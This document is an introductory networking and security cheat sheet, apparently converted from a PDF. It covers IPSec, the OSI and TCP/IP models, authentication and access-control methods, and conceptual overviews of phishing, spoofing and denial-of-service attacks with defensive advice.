You are on page 1of 75

Network 101 Cheat Sheet

What is a Client Computer? You can think a client as a computer in your network, where a
network user is performing some network activity. For Example: Downloading a file from a File
Server, Browsing Intranet/Internet etc. The network user normally uses a client computer to
perform his day to day work.

What is a Server Computer? The client computer establishes a connection to a Server computer
and accesses the services installed on the Server Computer. A Server is not meant for a network
user to browse in internet or do spreadsheet work. A Server computer is installed with appropriate
Operating System and related Software to serve the network clients with one or more services,
continuously without a break.

An Operating System (also known as "OS") is the most important set of software programs
which are loaded initially into any computer-like device by a bootstrap program. Operating
System controls almost all the resources in a computer, including networks, data storage, user &
user password database, peripheral devices etc.
The IPSec (Internet Protocol Security) Protocol Suite is a set of network security protocols,
developed to ensure the Confidentiality, Integrity, and Authentication of Data traffic over
TCP/IP network. IPSec Protocol Suite provides security to the network traffic by ensuring Data
Confidentiality, Data Integrity, Sender and Recipient Authentication and Replay Protection
Some network threats which are mitigated by using IPSec are
1) Data corruption in traffic
2) Data theft in traffic
3) Passwords and Account theft and
4) Network based attacks

IPSec (Internet Protocol Security) provides protection to Network Data Traffic (Primary
Goals of IPSec) in four different ways listed below.

1) Confidentiality: The Data in network traffic must be available only to the intended recipient.
In other words, the Data in network traffic MUST NOT be available to anyone else other than the
intended recipient. IPSec provides Data Confidentiality to Data by Encrypting it during its
journey.

2) Integrity: The Data in network traffic MUST NOT be altered while in network. In other words,
the Data which is received by the recipient must be exactly same as the Data sent from the Sender.
IPSec (Internet Protocol Security) provides Data Integrity by using Hashing Algorithms.
3) Authentication: Sender and the Recipient MUST PROVE their identity with each other. IPSec
provides Authentication services by using Digital Certificates or Pre-Shared keys.

4) Protection against Re-play Attacks: Network Re-play attacks (also called as "man-in-the-
middle attacks") allows an attacker to spy the network traffic between a sending device and a
receiving device. Later, the Re-play attacker uses the information he gained illegally for fake
authentication, fake authorization or to duplicate a transaction. IPSec protects against Re-play
attack by using sequence of numbers which are built into the IPSec packets. By using this sequence
numbers, IPSec can identify the packets which it has already seen.

IPSec can provide network security to end to end IP Traffic (also called as Transport mode) or
between two Gateways (also known as tunnel mode).

Transport mode: In Transport mode, only the Data Payload of the IP datagram is secured by IPSec.
IPSec inserts its header between the IP header and the upper levels.

Tunnel mode: In Tunnel Mode, entire IP datagram is secured by IPSec. The original IP Packet is
encapsulated in a new IP packet.

IPSec is integrated at the Layer 3 of the OSI model and hence it provides security for almost all
protocols in the TCP/IP protocol suite. As we discussed above, the IPSec (IP Security) Protocol
Suite is a set of network security protocols, consisting of different protocols/technologies to
provide Confidentiality, Integrity, Authentication and anti-replay capabilities.

Following are the three main components of IPSec.

1) Internet Key Exchange (IKE) Protocol: Internet Key Exchange (IKE) is an IETF protocol
and it has two versions, an old version IKEv1 and a relatively new version, IKEv2. Internet Key
Exchange (IKE) is used to establish Security Association (SA) between two communicating IPSec
devices.

2) Encapsulating Security Payload (ESP): IPSec uses ESP (Encapsulating Security Payload) to
provide Data Integrity, Encryption, Authentication, and Anti-Replay functions for IPSec VPN.
Cisco IPSec implementations uses DES, 3DES and AES for Data Encryption.

3) Authentication Header (AH): IPSec uses Authentication Header (AH) to provide Data
Integrity, Authentication, and Anti-Replay functions for IPSec VPN. Authentication Header
(AH) does not provide any Data Encryption. Authentication Header (AH) can be used to provide
Data Integrity services to ensure that Data is not tampered during its journey.
Seven Layers of Open Systems Interconnection (OSI) Model
Layer 1. Physical Layer
The first layer of the seven layers of Open Systems Interconnection (OSI) network model is
called the Physical layer. Physical circuits are created on the physical layer of Open
Systems Interconnection (OSI) model. Physical layers describe the electrical or optical
signals used for communication. Physical layer of the Open Systems Interconnection (OSI)
model is only concerned with the physical characteristics of electrical or optical signaling
techniques which includes the voltage of the electrical current used to transport the signal,
the media type (Twisted Pair, Coaxial Cable, Optical Fiber etc), impedance characteristics,
physical shape of the connector, Synchronization etc. The Physical Layer is limited to the
processes needed to place the communication signals over the media, and to receive signals
coming from that media. The lower boundary of the physical layer of the Open Systems
Interconnection (OSI) model is the physical connector attached to the transmission media.
Physical layer of the Open Systems Interconnection (OSI) model does not include the
transmission media. Transmission media stays outside the scope of the Physical Layer and
are also referred to as Layer 0 of the Open Systems Interconnection (OSI) Model.
Layer 2. Datalink Layer
The second layer of the seven layers of Open Systems Interconnection (OSI) network model
is called the Datalink layer. The Data Link layer resides above the Physical layer and below
the Network layer. Datalink layer is responsible for providing end-to-end validity of the
data being transmitted. The Data Link Layer is logically divided into two sublayers, The
Media Access Control (MAC) Sublayer and the Logical Link Control (LLC) Sublayer.
Media Access Control (MAC) Sublayer determines the physical addressing of the hosts.
The MAC sub-layer maintains MAC addresses (physical device addresses) for
communicating with other devices on the network. MAC addresses are burned into the
network cards and constitute the low-level address used to determine the source and
destination of network traffic. MAC Addresses are also known as Physical addresses,
Layer 2 addresses, or Hardware addresses.
The Logical Link Control sublayer is responsible for synchronizing frames, error checking,
and flow control.
Layer 3. Network Layer
The third layer of the seven layers of Open Systems Interconnection (OSI) network model
is the Network layer. The Network layer of the OSI model is responsible for managing
logical addressing information in the packets and the delivery of those packets to the
correct destination. Routers, which are special computers used to build the network, direct
the data packet generated by Network Layer using information stored in a table known as
routing table. The routing table is a list of available destinations that are stored in memory
on the routers. The network layer is responsible for working with logical addresses. The
logical addresses are used to uniquely identify a computer on the network, but at the same
time identify the network that system resides on. The logical address is used by network
layer protocols to deliver the packets to the correct network. The Logical addressing
system used in Network Layer is known as IP address.
IP addresses are also known as Logical addresses or Layer 3 addresses.
Layer 4. Transport Layer
The fourth layer of the seven layers of Open Systems Interconnection (OSI) network mode
is the Transport layer. The Transport layer handles transport functions such as reliable or
unreliable delivery of the data to the destination. On the sending computer, the transport
layer is responsible for breaking the data into smaller packets, so that if any packet is lost
during transmission, the missing packets will be sent again. Missing packets are
determined by acknowledgments (ACKs) from the remote device, when the remote device
receives the packets. At the receiving system, the transport layer will be responsible for
opening all of the packets and reconstructing the original message.
Another function of the transport layer is TCP segment sequencing. Sequencing is a
connection-oriented service that takes TCP segments that are received out of order and
place them in the right order.
The transport layer also enables the option of specifying a "service address" for the
services or application on the source and the destination computer to specify what
application the request came from and what application the request is going to.
Many network applications can run on a computer simultaneously and there should be
some mechanism to identify which application should receive the incoming data. To make
this work correctly, incoming data from different applications are multiplexed at the
Transport layer and sent to the bottom layers. On the other side of the communication, the
data received from the bottom layers are de-multiplexed at the Transport layer and
delivered to the correct application. This is achieved by using "Port Numbers".
The protocols operating at the Transport Layer, TCP (Transmission Control Protocol) and
UDP (User Datagram Protocol) uses a mechanism known as "Port Number" to enable
multiplexing and de-multiplexing. Port numbers identify the originating network
application on the source computer and destination network application on the receiving
computer.
Layer 5. Session Layer
The position of Session Layer of the Seven Layered Open Systems Interconnection (OSI)
model is between Transport Layer and the Presentation Layer. Session layer is the fifth
layer of seven layered Open Systems Interconnection (OSI) Model. The session layer is
responsible for establishing, managing, and terminating connections between applications
at each end of the communication.
In the connection establishment phase, the service and the rules (who transmits and when,
how much data can be sent at a time etc.) for communication between the two devices are
proposed. The participating devices must agree on the rules. Once the rules are established,
the data transfer phase begins. Connection termination occurs when the session is
complete, and communication ends gracefully.
In practice, Session Layer is often combined with the Transport Layer.
Layer 6. Presentation Layer
The position of Presentation Layer in seven layered Open Systems Interconnection (OSI)
model is just below the Application Layer. When the presentation layer receives data from
the application layer, to be sent over the network, it makes sure that the data is in the
proper format. If it is not, the presentation layer converts the data to the proper format.
On the other side of communication, when the presentation layer receives network data
from the session layer, it makes sure that the data is in the proper format and once again
converts it if it is not.
Formatting functions at the presentation layer may include compression, encryption, and
ensuring that the character code set (ASCII, Unicode, EBCDIC (Extended Binary Coded
Decimal Interchange Code, which is used in IBM servers) etc) can be interpreted on the
other side.
For example, if we select to compress the data from a network application that we are
using, the Application Layer will pass that request to the Presentation Layer, but it will be
the Presentation Layer that does the compression.
Layer 7. Application Layer
The Application Layer the seventh layer in OSI network model. Application Layer is the
top-most layer of the seven layered Open Systems Interconnection (OSI) network model.
Real traffic data will be often generated from the Application Layer. This may be a web
request generated from HTTP protocol, a command from telnet protocol, a file download
request from FTP protocol etc.
In this lesson (Seven Layers of Open Systems Interconnection (OSI) Model), you have
learned what are the Seven Layers of Open Systems Interconnection (OSI) Model and the
functions of these seven layers. The top-most layer of the Seven Layers of Open Systems
Interconnection (OSI) Model is the Application Layer and the bottom-most layer of the
Seven Layers of Open Systems Interconnection (OSI) Model is Physical Layer. Click
"Next" to Continue.

Comparison between seven layer OSI and four layer TCP/IP Models
As we can see from the above figure, presentation and session layers are not there in
TCP/IP model. Also note that the Network Access Layer in TCP/IP model combines the
functions of Datalink Layer and Physical Layer.
Layer 4. Application Layer
Application layer is the top most layer of four layer TCP/IP model. Application layer is
present on the top of the Transport layer. Application layer defines TCP/IP application
protocols and how host programs interface with Transport layer services to use the
network.
Application layer includes all the higher-level protocols like DNS (Domain Naming
System), HTTP (Hypertext Transfer Protocol), Telnet, SSH, FTP (File Transfer Protocol),
TFTP (Trivial File Transfer Protocol), SNMP (Simple Network Management Protocol),
SMTP (Simple Mail Transfer Protocol) , DHCP (Dynamic Host Configuration Protocol), X
Windows, RDP (Remote Desktop Protocol) etc.
Layer 3. Transport Layer
Transport Layer is the third layer of the four layer TCP/IP model. The position of the
Transport layer is between Application layer and Internet layer. The purpose of Transport
layer is to permit devices on the source and destination hosts to carry on a conversation.
Transport layer defines the level of service and status of the connection used when
transporting data.
The main protocols included at Transport layer are TCP (Transmission Control Protocol)
and UDP (User Datagram Protocol).
Layer 2. Internet Layer
Internet Layer is the second layer of the four layer TCP/IP model. The position of Internet
layer is between Network Access Layer and Transport layer. Internet layer pack data into
data packets known as IP datagrams, which contain source and destination address (logical
address or IP address) information that is used to forward the datagrams between hosts
and across networks. The Internet layer is also responsible for routing of IP datagrams.
Packet switching network depends upon a connectionless internetwork layer. This layer is
known as Internet layer. Its job is to allow hosts to insert packets into any network and
have them to deliver independently to the destination. At the destination side data packets
may appear in a different order than they were sent. It is the job of the higher layers to
rearrange them in order to deliver them to proper network applications operating at the
Application layer.
The main protocols included at Internet layer are IP (Internet Protocol), ICMP (Internet
Control Message Protocol), ARP (Address Resolution Protocol), RARP (Reverse Address
Resolution Protocol) and IGMP (Internet Group Management Protocol).
Layer 1. Network Access Layer
Network Access Layer is the first layer of the four layer TCP/IP model. Network Access
Layer defines details of how data is physically sent through the network, including how bits
are electrically or optically signaled by hardware devices that interface directly with a
network medium, such as coaxial cable, optical fiber, or twisted pair copper wire.
The protocols included in Network Access Layer are Ethernet, Token Ring, FDDI, X.25,
Frame Relay etc.
The most popular LAN architecture among those listed above is Ethernet. Ethernet uses an
Access Method called CSMA/CD (Carrier Sense Multiple Access/Collision Detection) to
access the media, when Ethernet operates in a shared media. An Access Method determines
how a host will place data on the medium.
IN CSMA/CD Access Method, every host has equal access to the medium and can place
data on the wire when the wire is free from network traffic. When a host wants to place
data on the wire, it will check the wire to find whether another host is already using the
medium. If there is traffic already in the medium, the host will wait and if there is no
traffic, it will place the data in the medium. But, if two systems place data on the medium
at the same instance, they will collide with each other, destroying the data. If the data is
destroyed during transmission, the data will need to be retransmitted. After collision, each
host will wait for a small interval of time and again the data will be retransmitted.

What is authentication?
Authentication is the process which allows a sender and receiver of information to validate each
other. If the sender and receiver of information cannot properly authenticate each other, there is
no trust in the activities or information provided by either party. Authentication can involve highly
complex and secure methods or can be very simple. The simplest form of authentication is the
transmission of a shared password between entities wishing to authenticate each other. Today’s
authentication methods uses some of the below factors.

1) What you know

An example of this type of Authentication is a "Password". The simple logic here is that if you
know the secret password for an account, then you must be the owner of that account. The
problems associated with this type of Authentication is that the password can be stolen, someone
might read it if you wrote it somewhere. If anyone came to know your password, he might tell
someone else. If you have a simple dictionary password, it is easy to crack it by using password
cracking software.

2) What you have


Examples of this type of Authentication are smart cards, tokens etc. The logic here is if you have
the smart card with you, you must be the owner of the account. The problems associated with
this type of authentication are you might lose the smart card, it can be stolen, or someone can
duplicate the smart card etc.

3) What you are

Examples of this type of authentication are your fingerprint, handprint, retina pattern, voice,
keystroke pattern etc. Problems associated with this type of authentication are that there is a chance
of false positives and false negatives. Chances are there that a valid user is rejected and an invalid
user is accepted. Often people are not comfortable with this type of authentication.

Network Authentication are usually based on Authentication protocols, Digital Certificates,


Username/Password, smart card etc. Some of the most important authentication protocols which
are used today are Kerberos, Challenge Handshake Authentication Protocol (CHAP), Microsoft
Challenge Handshake Authentication Protocol (MSCHAP) etc. We will learn about these
protocols in coming lessons.
The Kerberos protocol is a secure protocol, and it provides mutual authentication between a
client and a server. In Kerberos protocol, the client authenticates against the server and also the
server authenticates itself against the client. With mutual authentication, each computer or a user
and computer can verify the identity of each other. Kerberos is extremely efficient for
authenticating clients in large enterprise network environments. Kerberos uses secret key
encryption for authentication traffic from the client.
The same secret key is also used by the Kerberos protocol on the server to decrypt the
authentication traffic.

Kerberos protocol is built on top of a trusted third party, called as Key Distribution Center
(KDC). Key Distribution Center (KDC) acts as both an Authentication Server and as a Ticket
Granting Server. When a client needs to access a resource on the server, the user credentials
(password, Smart Card, biometrics) are presented to the Key Distribution Center (KDC) for
authentication. If the user credentials are successfully verified in the Key Distribution Center
(KDC), Key Distribution Center (KDC) issues a Ticket Granting Ticket (TGT) to the client. The
Ticket Granting Ticket (TGT) is cached in the local machine for future use. The Ticket Granting
Ticket (TGT) expires when the user disconnects or log off the network, or after it expires. The
default expiry time is one day (86400 seconds).

When the client wants to access a resource on a remote server, the client presents the previously
granted and cached Ticket Granting Ticket (TGT) to the authenticating KDC. The authenticating
Key Distribution Center (KDC) returns a session ticket to the client to access to the resource.
The client presents the session ticket to the remote resource server. The remote server allows the
session to be established to the resource after accepting the session ticket.

CHAP Authentication
Challenge Handshake Authentication Protocol (CHAP) is a remote access authentication
protocol used in conjunction with Point to Point Protocol (PPP) to provide security and
authentication to users of remote resources. CHAP is described in RFC 1994, which can be
viewed from http://www.rfc-editor.org/. Challenge Handshake Authentication Protocol (CHAP)
uses a challenge method for authentication. Challenge Handshake Authentication Protocol
(CHAP) doesn’t use a user ID/password mechanism. In Challenge Handshake Authentication
Protocol (CHAP), the initiator sends a logon request to the server. The server sends a challenge
back to the client. The challenge is encrypted and then sent back to the server. The server
compares the value from the client and, if the information matches, grants the session. If the
response fails, the session is denied, and the request phase starts over.

Challenge Handshake Authentication Protocol (CHAP) periodically verify the identity of the
peer using a three-way handshake. The verification the identity of the peer is done initially, and
may be repeated anytime after the link has been established.

Microsoft Challenge-Handshake Authentication Protocol (MS-CHAP) is the Microsoft


implementation of Challenge Handshake Authentication Protocol (CHAP). There are two
versions of Microsoft Challenge-Handshake Authentication Protocol (MS-CHAP), MS-
CHAPv1 and MS-CHAPv2. Microsoft Challenge-Handshake Authentication Protocol (MS-
CHAP) has some additional features, such as providing a method for changing passwords and
retrying in the event of a failure.

Retina Pattern, Iris Scan, Fingerprint, Handprint, Voice


Pattern, Keystroke Biometric Authentication
Each person has a set of unique characteristics that can be used for authentication. Biometrics
uses these unique characteristics for authentication. Today’s Biometric systems examine retina
patterns, iris patterns, fingerprints, handprints, voice patterns, keystroke patterns etc for
authentication. But most of the biometric devices which are available on the market, only retina
pattern, iris patterns, fingerprint and handprint systems are properly classified as biometric
systems. Others are more classified as behavioral systems.
Biometric identification systems normally work by obtaining unique characteristics from you,
like a handprint, a retina pattern etc. The biometric system then compares that to the specimen
data stored in the system.
Biometrics authentication is much better when compared with other types of authentication
methods. But the users are reluctant in using biometric authentication. For example, many users
feel that retina scanner biometric authentication system may cause loss of their vision. False
positives and false negatives are a serious problem with Biometric authentication.
Retina Pattern Biometric Systems
Everybody has a unique retinal vascular pattern. Retina Pattern Biometric system uses an
infrared beam to scan your retina. Retina pattern biometric systems examine the unique
characteristics of user’s retina and compare that information with stored pattern to determine
whether user should be allowed access. Some other biometric systems also perform iris and pupil
measurements. Retina Pattern Biometric Systems are highly reliable. Users are often worried in
using retina scanners because they fear that retina scanners will blind or injure their eyes.
Iris Scans Biometric Systems
Iris scan verify the identity by scanning the colored part of the front of the eye. Iris scan is is
much easier and very accurate.
Fingerprints Biometric Systems
Fingerprints are used in forensic and identification for long time. Fingerprints of each individual
are unique. Fingerprint Biometric Systems examine the unique characteristics of your
fingerprints and use that information to determine whether or not you should be allowed access.
The theoretical working of the fingerprint scanner is as described below. The user’s finger is
placed on the scanner surface. Light flashes inside the machine, and the reflection is captured by
a scanner, and it is used for analysis and then verified against the original specimen stored in the
system. The user is allowed or denied based on the result of this verification.
Handprints Biometric Systems
As in the case of finger print, everybody has unique handprints. A handprint Biometric Systems
scans hand and finger sand the data is compared with the specimen stored for you in the system.
The user is allowed or denied based on the result of this verification.
Voice Patterns Biometric Systems
Voice Patterns Biometric Systems can also be used for user authentication. Voice Patterns
Biometric Systems examine the unique characteristics of user’s voice.
Keystrokes Biometric Systems
Keystroke Biometric Systems examine the unique characteristics of user’s keystrokes and use
that information to determine whether the user should be allowed access.

What is token authentication?


Token technology is another method that can be used to authenticate users. Tokens are physical
devices used for the randomization of a code that can be used to assure the identity of the user.
Tokens provide an extremely high level of authentication.

There are different types of tokens. A particular type token is a small device with a keypad to
key in values. The server issues a challenge with a number when the user try to login. The user
keys this number into the token card, and the card displays a response.
The user inputs this response and sends it to the server, which calculates the same result it
expects to see from the token. If the numbers match, the user is authenticated.

Another type of token is based on time. This type of token display numbers at different intervals
of time. The user who needs the authentication should key in this time based values also at the
time of authentication. If the value from the token matches a value the server has calculated, the
account is authenticated, the user is allowed access.
What is Multi-Factor Authentication?
In multi-factor authentication, we expand on the traditional requirements that exist in a single
factor authentication. To accomplish this, multi-factor authentication will use another factor for
authentication in addition to the traditional password authentication.
For example, most password-based single authentication methods use a password. In multi-
factor authentication methods, we can tighten the authentication by adding a finger print
biometric scanner system also.
Multi-factor authentication is more secure single factor authentication, because it adds steps
that increase the layers of security.
What is Discretionary Access Control (DAC)?
Discretionary Access Control (DAC) allows authorized users to change the access control
attributes of objects, thereby specifying whether other users have access to the object. A simple
form of Discretionary Access Control (DAC) might be file passwords, where access to a file
requires the knowledge of a password created by the file owner. In Linux, the file permission is
the general form of Discretionary Access Control (DAC).

Discretionary Access Control (DAC) is the setting of permissions on files, folders, and shared
resources. The owner of the object (normally the user who created the object) in most operating
system (OS) environments applies discretionary access controls. This ownership may be
transferred or controlled by root/administrator accounts. Discretionary Access Control (DAC) is
controlled by the owner or root/administrator of the Operating System, rather than being hard
coded into the system.

The Discretionary Access Control (DAC) mechanisms have a basic weakness, and that is they
fail to recognize a fundamental difference between human users and computer programs.

What is Mandatory Access Control (MAC)?


Mandatory Access Control (MAC) is another type of access control which is hard-coded into
Operating System, normally at kernel level. Mandatory Access Control (MAC) can be applied
to any object or a running process within an operating system, and Mandatory Access Control
(MAC) allows a high level of control over the objects and processes. Mandatory Access
Control (MAC) can be applied to each object, and can control access by processes,
applications, and users to the object. Mandatory Access Control (MAC) cannot be modified by
the owner of the object.
Mandatory Access Control (MAC) mechanism constrains the ability of a subject (users or
processes) to access or perform some sort of operation on an object (files, directories,
TCP/UDP ports etc). Subjects and objects each have a set of security attributes. Whenever a
subject attempts to access an object, an authorization rule enforced by the operating system
kernel examines these security attributes and decides whether the access can take place.
Under Mandatory Access Control (MAC), the super user (root) controls all interactions of
software on the system.

What is Role-based Access Control (RBAC)?


Role-based Access Control (RBAC) is another method of controlling user access to file system
objects. In Role-based Access Control (RBAC), the system administrator establishes Roles
based on functional requirements or similar criteria. These Roles have different types and
levels of access to objects. The easy way to describe Role-based Access Control (RBAC) is
user group concept in Windows and GNU/Linux Operating Systems. A role definition should
be defined and created for each job in an organization, and access controls are based on that
role.
In contrast to DAC or MAC systems, where users have access to objects based on their own
and the object's permissions, users in an Role-based Access Control (RBAC) system must be
members of the appropriate group, or Role, before they can interact with files, directories,
devices, etc.

Networks are always susceptible to unauthorized monitoring and different types of


network attacks. If you have not implemented proper security measures and controls in
your network, there is a chance for network attacks from inside and outside your network.
Following chapters explain different types of networks attacks, which are listed below.

What is a network attack?


Network attack is usually defined as an intrusion on your network infrastructure that will first
analyze your environment and collect information in order to exploit the existing open ports or
vulnerabilities - this may include as well unauthorized access to your resources. In such cases
where the purpose of attack is only to learn and get some information from your system but the
system resources are not altered or disabled in any way, we are dealing with a passive attack.
Active attack occurs where the perpetrator accesses and either alters, disables or destroys your
resources or data. Attack can be performed either from outside of the organization by
unauthorized entity (Outside Attack) or from within the company by an "insider" that already
has certain access to the network (Inside Attack). Very often the network attack itself is
combined with an introduction of a malware components to the targeted systems (Malware has
been discussed in the Part 2 of this article series).

Some of the attacks described in this article will be attacks targeting the end-users (like Phishing
or Social Engineering) - those are usually not directly referenced as network attacks but I
decided to include them here for completeness purposes and because those kind of attacks are
widely widespread. Depending on the procedures used during the attack or the type of
vulnerabilities exploited the network attacks can be classified in following way(the provided list
isn't by any means complete - it introduces and describes only the most known and widespread
attack types that you should be aware of):

What types of attack are there?


• Social Engineering - refers to a psychological manipulation of people (here employees of the
company) to perform actions that potentially lead to leak of company's proprietary or
confidential information or otherwise can cause damage to company resources, personnel or
company image. Social engineers use various strategies to trick users into disclosing confidential
information, data or both. One of the very common technique used by social engineers is to
pretend to be someone else - IT professional, member of the management team, co-worker,
insurance investigator or even member of governmental authorities. The mere fact that the
addressed party is someone from the mentioned should convince the victim that the person has
right to know of any confidential or in any other way secure information. The purpose of social
engineering remains the same as purpose of hacking - unauthorized access gain to confidential
information, data theft, industrial espionage or environment/service disruption

• Phishing attack - this type of attack use social engineering techniques to steal confidential
information - the most common purpose of such attack targets victim's banking account details
and credentials. Phishing attacks tend to use schemes involving spoofed emails send to users that
lead them to malware infected websites designed to appear as real on-line banking websites.
Emails received by users in most cases will look authentic sent from sources known to the user
(very often with appropriate company logo and localized information) - those emails will contain
a direct request to verify some account information, credentials or credit card numbers by
following the provided link and confirming the information on-line. The request will be
accompanied by a threat that the account may become disabled or suspended if the mentioned
details are not being verified by the user.

Video: Symantec Guide to Scary Internet Stuff - Phishing


Symantec Security Response provides a portal where a suspected Phishing Site can be reported -
if you ever encountered the Phishing attack and have details from the spoofed email with link to
a specific suspicious website I highly recommend to report this to the provided portal:
https://submit.symantec.com/antifraud/phish.cgi
• Social Phishing - in the recent years Phishing techniques evolved much to include as well
social media like Facebook or Tweeter - this type of Phishing is often called Social Phishing.
The purpose remains the same - to obtain confidential information and gain access to personal
files. The means of the attack are bit different though and include special links or posts posted on
the social media sites that attract the user with their content and convince him to click on them.
The link redirects then to malicious website or similar harmful content. The websites can mirror
the legitimate Facebook pages so that unsuspecting user does not notice the difference. The
website will require user to login with his real information - at this point the attacker collects the
credentials gaining access to compromised account and all data on it. Other scenario includes
fake apps - users are encouraged to download the apps and install them - apps that contain
malware used to steal the confidential information.

Facebook Phishing attacks are often much more labored - consider following scenario - link
posted by an attacker can include some pictures or phrase that will attract the user to click on it.
The user does the click upon which he is redirected to mirror website that ask him to like the post
first before even viewing it - user not suspecting any harm in this clicks on "like" button but
doesn't realize that the "like" button has been spoofed and in reality is "accept" button for the
fake app to access user's personal information. At this point data is collected and account
becomes compromised. For the recommendations on how to protect your Facebook account and
do not fall a prey to Facebook Phishing have a look at the Security Response blog referenced
below.
Reference:

Phishers Use Malware in Fake Facebook App


https://www-secure.symantec.com/connect/blogs/phishers-use-malware-fake-facebook-app

• Spear Phishing Attack - this is a type of Phishing attack targeted at specific individuals,
groups of individuals or companies. Spear Phishing attacks are performed mostly with primary
purpose of industrial espionage and theft of sensitive information while ordinary Phishing attacks
are directed against wide public with intent of financial fraud. It has been estimated that in last
couple of years targeted Spear Phishing attacks are more widespread than ever before.
Video: Protect Against Spear Phishing and Advanced Targeted Attacks with Symantec
The recommendations to protect your company against Phishing and Spear Phishing
include:
1. Never open or download a file from an unsolicited email, even from someone you know (you
can call or email the person to double check that it really came from them)
2. Keep your operating system updated
3. Use a reputable anti-virus program
4. Enable two factor authentication whenever available
5. Confirm the authenticity of a website prior to entering login credentials by looking for a
reputable security trust mark
6. Look for HTTPS in the address bar when you enter any sensitive personal information on a
website to make sure your data will be encrypted
Source:
One Phish, Two Phish, Classic Phish, SPEAR Phish?!
https://www-secure.symantec.com/connect/blogs/one-phish-two-phish-classic-phish-spear-phish

• Watering Hole Attack - is a more complex type of a Phishing attack. Instead of the usual
way of sending spoofed emails to end users in order to trick them into revealing confidential
information, attackers use multiple-staged approach to gain access to the targeted information. In
first steps attacker is profiling the potential victim, collecting information about his or hers
internet habits, history of visited websites etc. In next step attacker uses that knowledge to
inspect the specific legitimate public websites for vulnerabilities. If any are vulnerabilities or
loopholes are found the attacker compromises the website with its own malicious code. The
compromised website then awaits for the targeted victim to come back and then infects them
with exploits (often zero-day vulnerabilities) or malware. This is an analogy to a lion waiting at
the watering hole for his prey.
Reference:
Internet Explorer Zero-Day Used in Watering Hole Attack: Q&A
https://www-secure.symantec.com/connect/blogs/internet-explorer-zero-day-used-watering-hole-
attack-qa

• Whaling - type of Phishing attack specifically targeted at senior executives or other high
profile targets within a company.

• Vishing (Voice Phishing or VoIP Phishing) - use of social engineering techniques over
telephone system to gain access to confidential information from users. This Phishing attack is
often combined with caller ID spoofing that masks the real source phone number and instead of
it displays the number familiar to the Phishing victim or number known to be of a real banking
institution. General practices of Vishing includes pre-recorded automated instructions for users
requesting them to provide bank account or credit card information for verification over the
phone.
• Port scanning - an attack type where the attacker sends several requests to a range of ports to
a targeted host in order to find out what ports are active and open - which allows him them to
exploit known service vulnerabilities related to specific ports. Port scanning can be used by the
malicious attackers to compromise the security as well by the IT Professionals to verify the
network security.

Symantec Endpoint Protection allows for port scan attack to be detected and blocked - the
condition for detection is fulfilled when SEP detects more than 4 local ports being accesses by
same remote IP within 200 seconds.
Reference:
What triggers a port scan detection in Symantec Endpoint Protection (SEP)
http://www.symantec.com/business/support/index?page=content&id=TECH165237
• Spoofing - technique used to masquerade a person, program or an address as another by
falsifying the data with purpose of unauthorized access. We can name few of the common
spoofing types:

1. IP Address spoofing - process of creating IP packets with forged source IP address to


impersonate legitimate system. This kind of spoofing is often used in DoS attacks (Smurf
Attack).

2. ARP spoofing (ARP Poisoning) - process of sending faked ARP messages in the network.
The purpose of this spoofing is to associate the MAC address with the IP address of another
legitimate host causing traffic redirection to the attacker host. This kind of spoofing is often used
in man-in-the-middle attacks.

3. DNS spoofing (DNS Cache Poisoning) - attack where the wrong data is inserted into
DNS Server cache, causing the DNS server to divert the traffic by returning wrong IP addresses
as results for client queries.

4. Email spoofing - process of faking the email's sender "From" field in order to hide real origin
of the email. This type of spoofing is often used in spam mail or during Phishing attack.

5. Search engine poisoning - attackers take here advantage of high profile news items or
popular events that may be of specific interest for certain group of people to spread malware and
viruses. This is performed by various methods that have in purpose achieving highest possible
search ranking on known search portals by the malicious sites and links introduced by the
hackers. Search engine poisoning techniques are often used to distribute rogue security products
(scareware) to users searching for legitimate security solutions for download.

• Network sniffing (Packet sniffing) - process of capturing the data packets travelling in
the network. Network sniffing can be used both by IT Professionals to analyse and monitor the
traffic for example in order to find unexpected suspicious traffic, but as well by perpetrators to
collect data send over clear text that is easily readable with use of network sniffers (protocol
analysers). Best countermeasure against sniffing is the use of encrypted communication between
the hosts.

• Denial of Service Attack (DoS Attack) and Distributed Denial of Service


Attack (DDoS Attack) - attack designed to cause an interruption or suspension of services
of a specific host/server by flooding it with large quantities of useless traffic or external
communication requests. When the DoS attack succeeds the server is not able to answer even to
legitimate requests any more - this can be observed in numbers of ways: slow response of the
server, slow network performance, unavailability of software or web page, inability to access
data, website or other resources. Distributed Denial of Service Attack (DDoS) occurs where
multiple compromised or infected systems (botnet) flood a particular host with traffic
simultaneously.

Video: Symantec Guide to Scary Internet Stuff - Denial of Service Attacks


Reference:
DoS (denial-of-service) attack
http://www.symantec.com/security_response/glossary/define.jsp?letter=d&word=dos-denial-of-
service-attack
Few of the most common DoS attack types:

♦ ICMP flood attack (Ping Flood) - the attack that sends ICMP ping requests to the
victim host without waiting for the answer in order to overload it with ICMP traffic to the point
where the host cannot answer to them any more either because of the network bandwidth
congestion with ICMP packets (both requests and replies) or high CPU utilization caused by
processing the ICMP requests. Easiest way to protect against any various types of ICMP flood
attacks is either to disable propagation of ICMP traffic sent to broadcast address on the router or
disable ICMP traffic on the firewall level.
♦ Ping of Death (PoD) - attack involves sending a malformed or otherwise corrupted
malicious ping to the host machine - this can be for example PING having size bigged that usual
which can cause buffer overflow on the system that lead to a system crash.

♦ Smurf Attack - works in the same way as Ping Flood attack with one major difference that
the source IP address of the attacker host is spoofed with IP address of other legitimate non
malicious computer. Such attack will cause disruption both on the attacked host (receiving large
number of ICMP requests) as well as on the spoofed victim host (receiving large number of
ICMP replies).
Reference:
ICMP Smurf Denial of Service
http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20611

♦ SYN flood attack - attack exploits the way the TCP 3-way handshake works during the
TCP connection is being established. In normal process the host computer sends a TCP SYN
packet to the remote host requesting a connection. The remote host answers with a TCP SYN-
ACK packet confirming the connection can be made. As soon as this is received by the first local
host it replies again with TCP ACK packet to the remote host. At this point the TCP socket
connection is established. During the SYN Flood attack the attacker host or more commonly
several attacker hosts send SYN Packets to the victim host requesting a connection, the victim
host responds with SYN-ACK packets but the attacker host never respond back with ACK
packets - as a result the victing host is reserving the space for all those connections still awaiting
the remote attacker hosts to respond - which never happens. This keeps the server with dead
open connections and in the end effect prevent legitimate host to connect to the server any more.

♦ Buffer Overflow Attack - this type of attack the victim host is being provided with
traffic/data that is out of range of the processing specs of the victim host, protocols or
applications - overflowing the buffer and overwriting the adjacent memory.. One example can be
the mentioned Ping of Death attack - where malformed ICMP packet with size exceeding the
normal value can cause the buffer overflow.

• Botnet - a collection of compromised computers that can be controlled by remote perpetrators


